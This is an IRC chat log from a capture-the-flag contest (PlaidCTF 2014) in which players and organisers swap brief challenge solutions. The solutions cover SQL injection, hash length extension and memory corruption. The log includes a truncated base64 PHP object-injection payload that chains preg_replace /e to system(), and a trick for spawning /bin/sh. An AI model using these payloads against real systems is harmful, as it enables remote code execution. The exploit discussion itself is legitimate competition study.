21:02 #pctf: < Adran> what was the answer to polygon since I kept getting gatway issues?
21:02 #pctf: < _blasty_> Im gonna watch all of MLP now.
21:02 #pctf: <@mserrano> _blasty_: lol
21:02 #pctf: < sven> :D
21:02 #pctf: < iago-x86> _blasty_: haha, I did basically the same
21:02 #pctf: < lavish> someone_: I used group_concat and dumped the whole stuff
21:02 #pctf: < Adran> my little brony
21:02 #pctf: < tomcr00se> polygon was sql injection
21:02 #pctf: <+tylerni7> _blasty_: pony captcha is best captcha
21:02 #pctf: < Rexperience7> GJ Everyone
21:02 #pctf: <@mserrano> _blasty_: Ricky would refresh until he got Princess Celestia
21:02 #pctf: <+dickoff> iago-x86: what team are you on?
21:02 #pctf: < comex> Ymgve: i compiled openssl with the evil compiler and stock gcc 4.8.2, bindiff, easy to find the difference
21:02 #pctf: < dkohlbre> awesie: yes i know, i couldn't figure out how to get the password, I unlocked the device without it :P
21:02 #pctf: < Rexperience7> it was fun
21:02 #pctf: < Valodim> pony captcha kept me going ♥
21:03 #pctf: < sssssssss> what bug in web800?
21:03 -!- zzoru [6e23254c@gateway/web/freenode/ip.110.35.37.76] has joined #pctf
21:03 #pctf: < iago-x86> dickoff: "Nate Delivers Breakfast" or "ndb"
21:03 #pctf: < whois> what is bronies2??
21:03 #pctf: <+awesie> dkohlbre: yeah, that is why i made the key the password :)
21:03 #pctf: < geobot> we used in the password
21:03 #pctf: < sven> sssssssss: wait for our writeup :)
21:03 #pctf: <+awesie> dkohlbre: you could get the password from the nvram
21:03 #pctf: < sssssssss> sure
21:03 #pctf: < comex> (first i tried bindiffing the compiler but it was compiled with two different compilers itself or something)
21:03 #pctf: < clockish> sven: we're all waiting for your writeup :)
21:03 #pctf: <@mserrano> whois: xss -> arb. file read -> mem corruption -> flag
21:03 -!- cimmi_ [1f2d47df@gateway/web/freenode/ip.31.45.71.223] has joined #pctf
21:03 #pctf: <+ricky> sssssssss: XSS in ponies site, stack buffer overflow leading to XSS in otp checking binary on login site, combine to steal cookie on login site
21:03 #pctf: <+awesie> dkohlbre: blackberry only uses sha1 to hash their device password :(
21:03 #pctf: < dkohlbre> awesie: thats what I figured,but I couldn't find any docs on it, and manual inspection wasn't turning it up
21:03 #pctf: < Ymgve> SHA1 hash of password was in mvram for blackberry
21:03 #pctf: < Ymgve> nvram
21:03 #pctf: <+ricky> sssssssss: Then there was an internal web server with more memory corruption to exploit
21:03 #pctf: < whois> memory couuption on /home/bigson/bigson binary?
21:03 #pctf: < Adran> mserrano: what was polygon? i saw the injection stuff, but then gateway sploded. :(
21:04 #pctf: < abuss> Adran, http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < Guest26684> arthurdent: ctftime.org will can index em all, submit them there - https://ctftime.org/event/119/tasks/
21:04 #pctf: < [CISSP]HoLyVieR> For WhatApp, what SQL where we suppose to use that fits in 64 caracters ?
21:04 #pctf: < tomcr00se> and what was weeee?
21:04 #pctf: < Ymgve> also: fun fact, if you delete the nvram file, you can access the phone and read the message without any password
21:04 #pctf: < iago-x86> Adran: Poly was a blind sqli
21:04 #pctf: < tomcr00se> Adran: sql injection
21:04 #pctf: < Beched> hey anybody
21:04 #pctf: <@mserrano> Adran: blind sql
21:04 #pctf: < mongo12> stack buffer overflow leading to XSS? how so?
21:04 #pctf: < Beched> pls show flag for web200
21:04 #pctf: < ronbarrey> looking for soultion to web150
21:04 #pctf: < Adran> okay. yeah got to the sql injection. then gatway ate me.
21:04 #pctf: < Adran> cool
21:04 #pctf: < dkohlbre> Ymgve: did you find docs on how its stored? or just find a sha1 hash and roll with it
21:04 #pctf: < iZsh> ricky: dont sploil the writeups ;-)
21:04 #pctf: < iZsh> for bronies2
21:04 #pctf: < _blasty_> Im eh, not looking forward to do the full bronies writeup
21:04 #pctf: < _blasty_> lol
21:04 #pctf: < Adran> ronbarrey: sql injection to get flag
21:04 #pctf: < geobot> sql injection of rm -rf / sven: don't die
21:04 #pctf: < lavish> 23:01 < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < lavish> change the page title
21:04 #pctf: < lavish> :P
21:04 #pctf: < Adran> abuss: thanks
21:04 #pctf: < Ymgve> dkohlbre: deleted original nvram, set a new password with "test", looked thru nvram for suspicious areas
21:04 #pctf: < rray> what was mtpox
21:04 #pctf: < Ymgve> the rest was thanks to google(tm) hash brute forcing
21:05 #pctf: < tomcr00se> so i had rop on harry_potter...what next?
21:05 #pctf: < abuss> lavish, <abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:05 #pctf: < abuss> hehehe
21:05 #pctf: < dkohlbre> Ymgve: did the exact same things... I'll take another look at my diff
21:05 #pctf: < dkohlbre> thanks
21:05 #pctf: < [CISSP]HoLyVieR> rray: mtbox what hash length extension + sqli
21:05 #pctf: < lavish> abuss: ooops
21:05 #pctf: <+ricky> iZsh: Sure thing, looking forward to reading
21:05 #pctf: < iago-x86> rray: mtpox was hash extension attack
21:05 #pctf: < iago-x86> google it, you'll find my blog as the second result. :)
21:05 #pctf: < yyyyyyy> so what was 20? :D
21:05 #pctf: < Beched> halphow2js FLAG pls, need to compare
21:05 #pctf: < bool101> yes what was the solution to harry_potter
21:05 #pctf: < rray> ahh, i was nowhere near solving mtpox :P
21:05 #pctf: < abuss> tomcr00se, how the hell did you get halphow2js so fast? 0.0
21:05 #pctf: < Ymgve> sooo was graphs supposed to be so easy to solve? (all private key vertices had a suspiciously low degree)
21:05 #pctf: <@mserrano> Ymgve: yes
21:06 #pctf: < tomcr00se> abuss: i have mad js skills :P
21:06 #pctf: < wtbw> Ymgve: treat it as a system of linear equations
21:06 #pctf: <@mserrano> Ymgve: you can just do Gaussian elimination and get a flag
21:06 #pctf: < abuss> well, better question, how were you suppoesd to get halphow2js :P
21:06 #pctf: < |x_x|> Time to start doing some writeups on what few I could do.
21:06 #pctf: < Valodim> lol graphs was awesome
21:06 -!- javex [javex@2a01:7e00::f03c:91ff:fe70:76f8] has left #pctf []
21:06 #pctf: < Ymgve> wtbw: fuck that, count degrees, see where the jump is
21:06 #pctf: < clockish> Beched: w00t_i_are_mastar_web_hackar
21:06 #pctf: < Valodim> privkey.add(node[0])
21:06 #pctf: < Valodim> bam
21:06 #pctf: < mongo12> how do you get XSS out of the stack overflow, for bronies1? wtf
21:06 #pctf: < robbje> any writeup on zfs?
21:06 -!- mode/#pctf [-o cai_] by cai_
21:06 #pctf: < whois> mserrano // how possible memory corruption bigson?
21:06 #pctf: < lavish> iago-x86: lol thank you! I used your hash_extender to solve mtpox!
21:06 #pctf: < Beched> clockish: thanks
21:06 #pctf: < tomcr00se> also, i shamefully failed at hudak
21:06 #pctf: < Ymgve> there was like no vertices with degrees between 20 and 30
21:06 #pctf: < upb> [CISSP]HoLyVieR: but what do you extend b:0; to to get anything other than bool(false) ? :P
21:06 #pctf: < lavish> iago-x86: that program rulez
21:06 #pctf: < zoku> who wrote ezhp?
21:06 #pctf: <@mserrano> zoku: I did
21:06 #pctf: < tomcr00se> mserrano: i am so bad at your problems, paris and hudak
21:06 #pctf: < sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D
21:06 #pctf: < wtbw> Ymgve: oh, sneaky!
21:06 -!- Rinko [3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103] has joined #pctf
21:06 -!- keidii [~niepodam@195.164.49.134] has joined #pctf
21:06 #pctf: < Beched> was there any flag like flag{_0r1g1nally_t1m3_1$_running_0ut_} ??
21:06 #pctf: < geobot> i need to add more during the flag hack all the doors at once and sweaty bodies everywhere aswell
21:06 #pctf: < keidii> .
21:06 #pctf: <+cai_> >.>
21:06 #pctf: < zoku> ah, was I almost there mserrano?
21:07 #pctf: < [CISSP]HoLyVieR> upb: The string is reversed before being hashed
21:07 #pctf: <@mserrano> zoku: yes
21:07 #pctf: < robbje> sven: how? i didn't get it after 10h
21:07 #pctf: < wtbw> Ymgve: not a generic break though!
21:07 #pctf: < dkohlbre> where was the write/overflow in kappa? I had like 3 crash bugs and some arbitrary reads... but no writes
21:07 #pctf:  * wtbw idealist
21:07 #pctf: <+dickoff> tomcr00se: paris was Frisk0's
21:07 #pctf: < whois> mserrano // bigson binary has corruption vuln?
21:07 #pctf: <@mserrano> tomcr00se: paris isn't mine - I did test it though
21:07 #pctf: < zoku> what system is it running on mserrano?
21:07 #pctf: < iago-x86> When I saw it was hash extension, I considered adding a bug to hash_extender ;)
21:07 #pctf: < jix> using a SAT solver also worked fine to recover the private key for a given graph pubkey
21:07 #pctf: <+ricky> dickoff: kappa was type confusion (dickoff wrote it)
21:07 #pctf: < zoku> really curious why it's not working
21:07 #pctf: < iago-x86> I'm curious how many downloads I got this weekend
21:07 #pctf: < keidii> anyone can spoil details on bbos ?
21:07 #pctf: < wtbw> Paris was nice
21:07 #pctf: < Ymgve> wtbw: yeah, I thought about if there was a generic solution but too busy to follow it up
21:07 #pctf: < [CISSP]HoLyVieR> upb: and b:1; ... garbage .... b;0 deserialize give "true"
21:07 #pctf: <+ricky> dickoff: Sorry, that as for dkohlbre
21:07 #pctf: < lavish> iago-x86: lol
21:07 #pctf: < upb> [CISSP]HoLyVieR: oh hmm
21:07 #pctf: <@mserrano> zoku: 64-bit debian ami, using the i386 libraries from multiarch
21:07 #pctf: < Ymgve> is there a way to solve rendezvous without recompiling Tor?
21:07 #pctf: < rray> so.. whatscat, what was the solution?
21:07 #pctf: < Frisk0> I'm glad you liked Paris :)
21:07 #pctf: < dkohlbre> ricky: yeah, i just wasn't finding any writes I could control, ah well
21:07 -!- mode/#pctf [+v Frisk0] by mserrano
21:07 -!- Apple_Eater [~Apple_Eat@mail.appleeater.com] has left #pctf []
21:07 -!- D3AdCa7 [d220a27e@gateway/web/freenode/ip.210.32.162.126] has joined #pctf
21:07 #pctf: < tomcr00se> rray: sqli in username, or probably dns magic
21:08 #pctf: < AnthraX101> Serialize all the things!
21:08 #pctf: < choppers> dkohlbre: write to the art, overwrite the inspect() pointer to be system()
21:08 -!- oceanx_ [~oceanx@131.175.28.197] has joined #pctf
21:08 #pctf: < wtbw> Paris is the sort of thing that makes me want to code better analysis tools
21:08 #pctf: <+dickoff> dkohlbre: fill up your pokemon with kakuna, go catch a charizard, the art struct will now overflow the function pointer.
21:08 #pctf: < iago-x86> Finding system() was the hard part
21:08 #pctf: < zoku> ah, thanks mserrano
21:08 -!- blagh [~blagh@ncpatel.res.wpi.net] has joined #pctf
21:08 #pctf: < iago-x86> Well, not really
21:08 #pctf: < dkohlbre> choppers: goddammit im an idiot, I did that
21:08 #pctf: < oceanx_> damn I just solved nightmares :<
21:08 #pctf: < iago-x86> I just sucked. :)
21:08 #pctf: < D3AdCa7> how to solve web800 stage1.....
21:08 #pctf: < wtbw> because I'm sure it could e done much faster
21:08 #pctf: < wtbw> *be
21:08 #pctf: <+awesie> btw, i will post a blog post about the website issues and how we resolved them at some point
21:08 #pctf: < dkohlbre> choppers: literally did that and forgot it gets run
21:08 #pctf: < KT> what was the solution of "parlor"?
21:08 #pctf: < abuss> tomcr00se, dns magic?
21:08 -!- shabgrd [~mostafa@188.158.102.68] has joined #pctf
21:08 #pctf: <@mserrano> did anyone like tiffany?
21:08 -!- shabgrd [~mostafa@unaffiliated/shabgard] has joined #pctf
21:08 #pctf: <@mserrano> tiffany was my favorite
21:08 #pctf: < iago-x86> awesie: That's awesome! Make sure you cc: shmoocon :)
21:08 #pctf: < choppers> dkohlbre: if you name your pokemon /bin/sh you get system("/bin/sh")
21:08 #pctf: < [CISSP]HoLyVieR> tomcr00se: What SQLi did you use for WhatApp, the only table I could leak with 64 caracters was comments ?
21:08 #pctf: < tomcr00se> awesie: harry_potter after you have rop?
21:08 #pctf: < keidii> anyone solve BBOS here ??
21:08 #pctf: < Ymgve> KT: server lies, nonce is used repeatedly, so hash extension
21:08 #pctf: <+tylerni7> <3 awesie and cai_ for making the site work
21:08 #pctf: < zoku> mserrano: tiffany was fucked
21:08 #pctf: < zoku> mserrano: did you write that too?
21:08 #pctf: <@mserrano> yes
21:09 #pctf: < tomcr00se> [CISSP]HoLyVieR: i guessed (select * from flag) :P
21:09 #pctf: < okami41> mserrano: tiffany was a lot of fun, it took me forever though!
21:09 #pctf: < ryan-c> https://gist.github.com/anonymous/10602398#file-pctf2014-rsa450 < rsa writeup
21:09 #pctf: < [int3]romansoft> <sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D -> wtf!!! How did you find key.xor_encrypted amd xor_key contents? Offsets of them?
21:09 #pctf: < wtbw> mserrano: well I said "what about 'breakfast at tiffany's'?"
21:09 #pctf: < mak`> what was correct solution to zfs?
21:09 #pctf: <+awesie> tomcr00se: you should've been able to just use system(...) to run commands
21:09 #pctf: < ryan-c> tylerni7: ^^^
21:09 -!- bs` [~bs@gateway/tor-sasl/bs/x-48276796] has joined #pctf
21:09 #pctf: < Ymgve> keidii: SHA1 hashes of device password in nvram
21:09 #pctf: < okami41> i kept wanting to set breakpoints
21:09 #pctf: < mak`> without brute?
21:09 #pctf: <@mserrano> I wrote ezhp, tiffany, mtpox, kpop, hudak, moscow, wheee, twenty, mult. is hard
21:09 #pctf: < keidii> Ymgve , och
21:09 #pctf: < spq> hy, thanks for the nice ctf
21:09 #pctf: < [CISSP]HoLyVieR> tomcr00se: oh wow ... :/
21:09 #pctf: < tomcr00se> awesie: but how to find libc?
21:09 #pctf: < dkohlbre> choppers: yeah I had that, godammit I was so tired and looking for a write, somehow ignored I was writing a function pointer that i knew
21:09 #pctf: < upb> grrrrr wtf
21:09 #pctf: < bool101> wow mserrano nice
21:09 #pctf: < dkohlbre> choppers: ah well ty
21:09 #pctf: <+awesie> tomcr00se: you could leak libc address
21:09 #pctf: < tomcr00se> before socket shutdown?
21:09 #pctf: < iago-x86> mserrano: I solvee ezhp, mtpox, and kpop :)
21:09 #pctf: < ryan-c> tomcr00se: did you write an attack for rsa from scratch or use the c poc by the people that wrote that paper?
21:10 #pctf: < tomcr00se> i could either leak libc address OR use libc address
21:10 #pctf: < Ymgve> mserrano: was there some agreement to use city names for VM tasks? :)
21:10 #pctf: < bool101> liked that problem awesie
21:10 #pctf: <+awesie> tomcr00se: don't shutdown the socket, you could get the argument to new() to be -1
21:10 #pctf: < rray> iago-x86: how did you solve kpop? wob was too hard
21:10 #pctf: < tomcr00se> ryan-c: lol poc of course
21:10 #pctf: < zoku> iago-x86: what was your ezhp solution?
21:10 #pctf: <@mserrano> Ymgve: I named both of them :P
21:10 #pctf: < foundation> do you guys know who runs chandler tor node ?
21:10 #pctf: <+awesie> tomcr00se: if you have a string of the form: AAAA...PASSWORD
21:10 #pctf: < Ymgve> paris was nasty
21:10 #pctf: <+houqp_> foundation: yeah
21:10 #pctf: < abuss> How did nightmare work? I did try read/write to /proc/self/mem but it gave me i/o error
21:10 #pctf: <@mserrano> paris was a great problem
21:10 #pctf: < iago-x86> rray: kpop = take advantage of preg_replace()'s /e extension
21:10 #pctf: < foundation> he's gonna be scraching his head over this weekend i guess :)
21:10 -!- eZpl0it [~ezpl0it@lak-73-103.wohnheime.ruhr-uni-bochum.de] has joined #pctf
21:10 #pctf: < tomcr00se> awesie: ahh, i missed that, and new will throw
21:10 #pctf: <+houqp_> foundation: we contacted the operator before hand :)
21:10 #pctf: <+awesie> tomcr00se: yep
21:10 #pctf: < wtbw> I really liked that Paris was "clean", other than SEH usage
21:10 #pctf: < foundation> houqp_: cool
21:10 #pctf: < wtbw> no bs, just complication
21:10 #pctf: <+awesie> w/in 7
21:10 #pctf: < blagh> how did mtpox work? I never managed to pull it off
21:10 #pctf: <+awesie> ugh
21:10 #pctf: < rray> iago-x86: i was trying to exploit that at one point, but i couldn't control what went into preg_replace
21:10 #pctf: < iago-x86> zoku: It was basically owning a linked list, I think?
21:11 #pctf: < rray> i guess i'll wait for the writeup
21:11 #pctf: < spq> abuss: i made it with python bytecode to x86 shellcode
21:11 #pctf: <+houqp_> foundation: they were very happy with that :)
21:11 #pctf: <@mserrano> blagh: hash extension -> sql injection
21:11 #pctf: < ryan-c> tomcr00se: it took a while for me to think to look for a poc, people who write papers rarely release code
21:11 #pctf: < iago-x86> rray: You can control it via deserializing $_COOKIE['lyrics']
21:11 #pctf: < rray> 0_0
21:11 #pctf: < KT> <Ymgve>: but you dont know the highest 28 bits of the hash, so how do you extend it?
21:11 -!- jn__ [bert@bitcoinshell.mooo.com] has joined #pctf
21:11 #pctf: <@mserrano> rray: look up stefan esser's slides on POP chains
21:11 #pctf: < Ymgve> KT: brute force
21:11 #pctf: < ryan-c> anyone else here get parlor?
21:11 #pctf: < rray> ... i did that, but i did it wrong haha
21:11 -!- nofiki [~Adium@207.98.148.16] has joined #pctf
21:11 #pctf: < iago-x86> Haha
21:11 #pctf: < iago-x86> I actually used a whiteboard to draw the object structure
21:11 #pctf: < KT> Ymgve: ok, true, nice :D
21:11 #pctf: < iago-x86> Good times
21:11 #pctf:  * iago-x86 signs off
21:11 #pctf: < Ymgve> KT: do two guesses in sequence then use brute force locally to find the remaining bits
21:11 #pctf: < iago-x86> (metaphorically)
21:11 #pctf: <@mserrano> Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjQ6ImFzZGYiO3M6NzoiACoAc29uZyI7Tzo0OiJTb25nIjo0OntzOjk6IgAqAGxvZ2dlciI7Tzo2OiJMb2dnZXIiOjE6e3M6MTI6IgAqAGxvZ3dyaXRlciI7TzoxNDoiTG9nV3JpdGVyX0ZpbGUiOjI6e3M6MTE6IgAqAGZpbGVuYW1lIjtzOjg6InNvbWVzaGl0IjtzOjk6IgAqAGZvcm1hdCI7TzoxMzoiTG9nRmlsZUZvcm1hdCI6Mjp7czoxMDoiACoAZmlsdGVycyI7YToxOntpOjA7TzoxMjoiT3V0cHV0RmlsdGVyIjoyOntzOjE1OiIAKgBtYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNDoiACoAcmVwbGFjZW1lbnQiO3M6MzU6InN5c3RlbSg
21:11 #pctf: < rray> mserrano: i was looking at the article he wrote, in retrospect i was actually quite close :P
21:11 #pctf: < abuss> spq, nice, got a writeup? I tried to build bytecode that would call os.system but I couldn't get import to work
21:12 #pctf: <@mserrano> importing that
21:12 #pctf: <@mserrano> oh shit that got truncated
21:12 #pctf: <@mserrano> oh well
21:12 #pctf: <@mserrano> would get flag
21:12 #pctf: < whois>  who know bbos ?
21:12 #pctf: < deject3d_> where writeups
21:12 #pctf: < foundation> was there an easy way of solving g++ , those c++ templates ?
21:12 #pctf: < abuss> ryan-c, curious how? I spent an hour or so on that but couldn't find any way to predict output
21:12 #pctf: <@mserrano> http://paste2.org/Nn46z87k <- import this on kpop, obtain flag
21:12 #pctf: < zoku> iago-x86: yea, had to overflow one buffer to write to the linked list
21:12 #pctf: < spq> abuss: i'll see
21:12 #pctf: < Ymgve> whois: SHA1 hashes of device password in nvram
21:12 #pctf: < abuss> it wasn't a lcg as far as I could tell
21:12 #pctf: < tomcr00se> foundation: dynamically
21:12 #pctf: < comex> foundation: i tried z3 but it didn't work :p
21:12 #pctf: < ryan-c> abuss: hash length extension attack
21:12 #pctf: < blagh> mserrano: Well, I was going down a completely wrong path
21:12 #pctf: < whois> Ymgve // Thx, !
21:12 #pctf: < abuss> god dammit I really need to figure out how those work
21:12 #pctf: < abuss> haha
21:12 #pctf: < ryan-c> abuss: you can get the last 100 bits of the md5
21:13 #pctf: < yyyyyyy> sooooo..... guys.... anyone solved the almost-feistel cipher?
21:13 #pctf: < ryan-c> abuss: extend it blind
21:13 #pctf: < zardus> great ctf, guys
21:13 -!- Dumpling [~butt@only.real.hackers.use.php.xxx] has joined #pctf
21:13 #pctf: < marcoscars02> ryan-c, awesome write
21:13 #pctf: <@mserrano> yyyyyyy: :)
21:13 #pctf: <+tylerni7> btw, who solved RSA? curious how you did it?
21:13 #pctf: <@mserrano> yyyyyyy: Slide attack
21:13 #pctf: < NK_> never saw a ctftime update as quickly
21:13 #pctf: < NK_> :)
21:13 #pctf: < foundation> tomcr00se: dynamically ?  i tried to mess with recursion depth , to figure out something ...
21:13 #pctf: <+tylerni7> apparently there was code posted :(
21:13 #pctf: < zardus> my favorite was harry potter :-)
21:13 #pctf: < [int3]romansoft> please, offsets of key.xor_encrypted and xor_key (zfs)???
21:13 #pctf: <@mserrano> yyyyyyy: you can reverse a single double-round in <= 4096 iterations
21:13 #pctf: <+tylerni7> I wanted people to solve themselves
21:13 #pctf: < tomcr00se> tylerni7: the code from the paper
21:13 #pctf: < ryan-c> abuss: and brute force the other 28 bits to find something that resulted in a matching second hash
21:13 #pctf: < abuss> tylerni7, kmowery
21:13 #pctf: <+tylerni7> tomcr00se: damn
21:13 #pctf: <@mserrano> yyyyyyy: and then using ~512 plaintexts you can reliably get a slid pair
21:13 #pctf: <+tylerni7> tomcr00se: I didn't know about the code D:
21:13 #pctf: <+tylerni7> someone else linked me to it
21:13 #pctf: < abuss> nice okay
21:13 #pctf: < ryan-c> marcoscars02: It's a quick shitty writeup, lol will make a better one later
21:13 #pctf: < tomcr00se> tylerni7: wait you really wrote that attack?
21:13 #pctf: < fuzyll> tylerni7: tomcr00se: what paper?
21:13 #pctf: <@mserrano> tomcr00se: yeah, he did
21:13 #pctf: <+tylerni7> tomcr00se: yeah I have it in python
21:13 #pctf: <@mserrano> it's pretty cool
21:14 #pctf: < marcoscars02> awesome code ryan-c
21:14 #pctf: < marcoscars02> :O
21:14 #pctf: < sven> i think segher wrote his own code too after reading the paper
21:14 #pctf: < ryan-c> fuzyll: http://cseweb.ucsd.edu/~hovav/papers/hs09.html
21:14 #pctf: < geobot> yeah ucsd revealed themselves
21:14 #pctf: <+tylerni7> sven: :) good
21:14 #pctf: < sven> not sure though :)
21:14 #pctf: <+tylerni7> geobot: yes.. they did
21:14 #pctf: <@mserrano> sven: how did DS get wheee?


[01:17] <yyyyyyy> mserrano, I actually didn't know that attack... :/ thanks for explaining
[01:17] <@mserrano> sven: did you guys actually do the 26**3 requests?
[01:18] <ryan-c> I got part way through writing my own code from the paper too
[01:18] == irctc736 [806f3006@gateway/web/freenode/ip.128.111.48.6] has joined #pctf
[01:18] <abuss> tylerni7, the best part is that our crypto guy didn't see that link
[01:18] <tomcr00se> what was the wheee solution?
[01:18] == bs` [~bs@gateway/tor-sasl/bs/x-48276796] has quit [Remote host closed the connection]
[01:18] <abuss> and spent quite a while writing from scratch
[01:18] <mak`> zfs anyone? ;]
[01:18] <@mserrano> tomcr00se: http://www.theamazingking.com/crypto-slide.php
[01:18] <abuss> and then noticed it after submitting flag :P
[01:18] == Im11Plus1 [~dsa@wsip-72-215-223-131.om.om.cox.net] has quit [Remote host closed the connection]
[01:18] <dkohlbre> tylerni7: the best part is that he IS HOVAV'S GRAD STUDENT
[01:18] <abuss> ^^^^
[01:18] <sven> mserrano: uh.. i know that someone implemented the slide attack, dunno how many requests we sent though
[01:18] == bs` [~bs@gateway/tor-sasl/bs/x-48276796] has joined #pctf
[01:18] <@mserrano> sven: ah cool
[01:18] == deject3d_ [~deject3d@205.204.16.136] has quit [Quit: Computer has gone to sleep.]
[01:18] <@mserrano> someone was gonna do 26**3 blocks
[01:19] <sven> :D
[01:19] <ryan-c> abuss: he wrote a solver from the paper then found the source?
[01:19] <@mserrano> but you can do it in < 512; I got it with 256
[01:19] <+tylerni7> dkohlbre: haha whatt
[01:19] <@mserrano> (aka a single request)
[01:19] <tomcr00se> grr, yea, i figured it was something like this, but i was too tired this morning
[01:19] <whois> whats tor(rendezvous) prob?
[01:19] <+tylerni7> that's geat
[01:19] <sssssssss> how to solve halphow2js?
[01:19] <dkohlbre> tylerni7: yeah, he grabbed the paper, wrote a new impl, and THEN noticed the impl by hovav
[01:19] <@mserrano> dkohlbre: LOL
[01:19] <+tylerni7> dkohlbre: that makes me so happy
[01:19] == Rexperience7 [~Rex@unaffiliated/rexperience7] has left #pctf []
[01:19] <dkohlbre> sooo now we have 2
[01:19] <clockish> :D
[01:19] <+tylerni7> lol
[01:19] <asmoday> HEY whats the next CTF
[01:20] <whois> using chandler router  to connect onion ?
[01:20] <marcoscars02> asmoday, sqli
[01:20] <+tylerni7> asmoday: ctftime.org
[01:20] <marcoscars02> xD
[01:20] <asmoday> so that site is up to date
[01:20] <+tylerni7> yeah
[01:20] <Ymgve> How do you specify a router to use as a rendezvous point?
[01:20] <wtbw> thanks again guys :)
[01:20] <foundation> whois: yes, you had to patch the tor source to make sure it uses chandler as rendezvous point
[01:20] <ryan-c> whois: you have to modify tor in a couple places - first to handle an unencryped list of intro points, then to force using chandler as a rend point, then to include beef in the rend cookie
[01:20] <mathiasbynens> multiplication is hard write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/multiplication-is-hard
[01:20] <ryan-c> Ymgve: you have to modify the tor source code
[01:20] <asmoday> multiplication is hard, oh the memories
[01:20] <foundation> Ymgve: source patching
[01:20] <Ymgve> ryan-c: was afraid of that
[01:20] <whois> oh ,,
[01:21] == wtbw [~wtbw@unaffiliated/wtbw] has quit []
[01:21] <jix> ryan-c: unencrypted list of intro points?
[01:21] <ryan-c> it was a pain in the arse
[01:21] <jix> ryan-c: I didn't have to do that
[01:21] == oceanx_ [~oceanx@131.175.28.197] has quit [Ping timeout: 276 seconds]
[01:21] <pipecork> mathiasbynens: lol
[01:21] <ryan-c> jix: hm
[01:21] <jix> only chandler as rend point and beef as cookie
[01:21] <mathiasbynens> pipecork: the real tough ones :')
[01:21] <jix> but it was painful
[01:21] <mathiasbynens> please add links to your write-ups here https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014
[01:21] <jix> especially chandler as rend point
[01:21] <abuss> oh my god that jshalp
[01:21] <abuss> 0.0
[01:21] == stach [~cl@168.61.35.66] has left #pctf []
[01:21] <tomcr00se> i loved jshalp
[01:21] <dkohlbre> ok time to go home, ty ppp
[01:22] <sven> freya annoyed me the most. especially 'cause all i did was recompile openssh in the end to make it work :<
[01:22] <+awesie> dkohlbre: thanks for playing :)
[01:22] <sdjakl> re wheeeee, i wrote the slide attack. we used 256 blocks
[01:22] <sdjakl> (for whoever was asking sven)
[01:22] <mathiasbynens> tomcr00se: did you solve it the same way? https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
[01:22] <clockish> abuss: do you know how to js
[01:22] <abuss> clockish, so what did mystop do? I spent HOURS trying to reverse and black box it
[01:22] <sven> mserrano: ^--
[01:22] <ryan-c> anyone do a writeup of curlcore?
[01:22] <abuss> clockish, LOLNO
[01:22] <clockish> abuss: i don't either
[01:22] == eZpl0it [~ezpl0it@lak-73-103.wohnheime.ruhr-uni-bochum.de] has quit [Ping timeout: 252 seconds]
[01:22] <abuss> it was like the collatz function
[01:22] <abuss> but with an exception
[01:22] <@mserrano> tomcr00se: anyone else wondering: https://gist.github.com/mserrano/54465a80ffe75739d2ee
[01:22] <abuss> that had an exception
[01:22] <+tylerni7> ryan-c: use something to search for aes key schedule
[01:22] <@mserrano> sven: sdjakl: cool
[01:23] <+tylerni7> then cbc
[01:23] <+tylerni7> :P
[01:23] <ryan-c> tylerni7: goddamnit
[01:23] <ryan-c> really?
[01:23] <clockish> abuss: yeah, exactly. I just modified the collatz function with some shit
[01:23] <ryan-c> I threw aeskeyfind at it first thing
[01:23] <@mserrano> (that gist uses 512 blocks, but you can use 256 and it will work with very high probability)
[01:23] <ryan-c> and got an aes key
[01:23] <geobot> ah, thought it will win 8 to search for aes key schedule
[01:23] <@mserrano> (csol is just a C implementation of the cipher)
[01:23] <+tylerni7> ryan-c: yeah, aeskeyfind may not work, but some tools do
[01:23] <tomcr00se> too tired to even read that :P
[01:23] <marcoscars02> steg writeup?
[01:23] <marcoscars02> :DD
[01:23] <Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h ?
[01:23] <clockish> mathiasbynens: yeah, good write up, that's basically the intended solution :)
[01:24] <sdjakl> a
[01:24] <+tylerni7> marcoscars02: randomize the palette
[01:24] <ryan-c> aeskeyfind gave me 68f946e9c1fd339eec04fc048e651ba7642ee8df2519aaf308ab567f7e4bc231
[01:24] <+tylerni7> then reopen image
[01:24] <+tylerni7> ryan-c: there are 2 keys
[01:24] <ryan-c> next to some asn1 structures
[01:24] <Beched> lol people say that penthackon team cheats like ASSholes asking ppl for hints or flags, pretending they are some poor small team in the bottom of scoreboard. And they post FAKE flags in PM LOL
[01:24] <+tylerni7> one for encrypting, one for decrypting
[01:24] <+tylerni7> (each side of the connection)
[01:24] <_blasty_> LOL Beched
[01:24] <sven> :D
[01:24] <ryan-c> tylerni7: you mean one for server->client and one for client->server?
[01:24] == Valion [~Valion@c-75-70-225-60.hsd1.co.comcast.net] has joined #pctf
[01:24] <rray> thx ppp, it was a cool ctf
[01:24] <Ymgve> I think Beched got burned
[01:24] <+tylerni7> ryan-c: yep
[01:24] <arthurdent> tylerni7: how do you randomize the pallete?
[01:24] <@mserrano> rray: :)
[01:24] <Beched> Ymgve: ??
[01:24] <+tylerni7> arthurdent: open it up in something like 010
[01:25] <abuss> yeah, great problems! can't wait until I can do more than 10% of them :P
[01:25] <tomcr00se> mathiasbynens: sort of, i did "+6"
[01:25] <Beched> tomcr00se: the same with penthackon was at olympic
[01:25] <Adran> marcoscars02: Have you played with StegSolver? :)
[01:25] <marcoscars02> zsteg
[01:25] <marcoscars02> :S
[01:25] == yyyyyyy [~yyyyyyy@91.229.244.121] has left #pctf []
[01:26] == lkwpeter [~florian@studpool-wlan-74-78.fs.fbi.h-da.de] has quit [Ping timeout: 245 seconds]
[01:26] <marcoscars02> and a lot of brain xDD
[01:26] <sdjakl> l/win 18
[01:26] == lkwpeter1 [~florian@studpool-wlan-74-78.fs.fbi.h-da.de] has joined #pctf
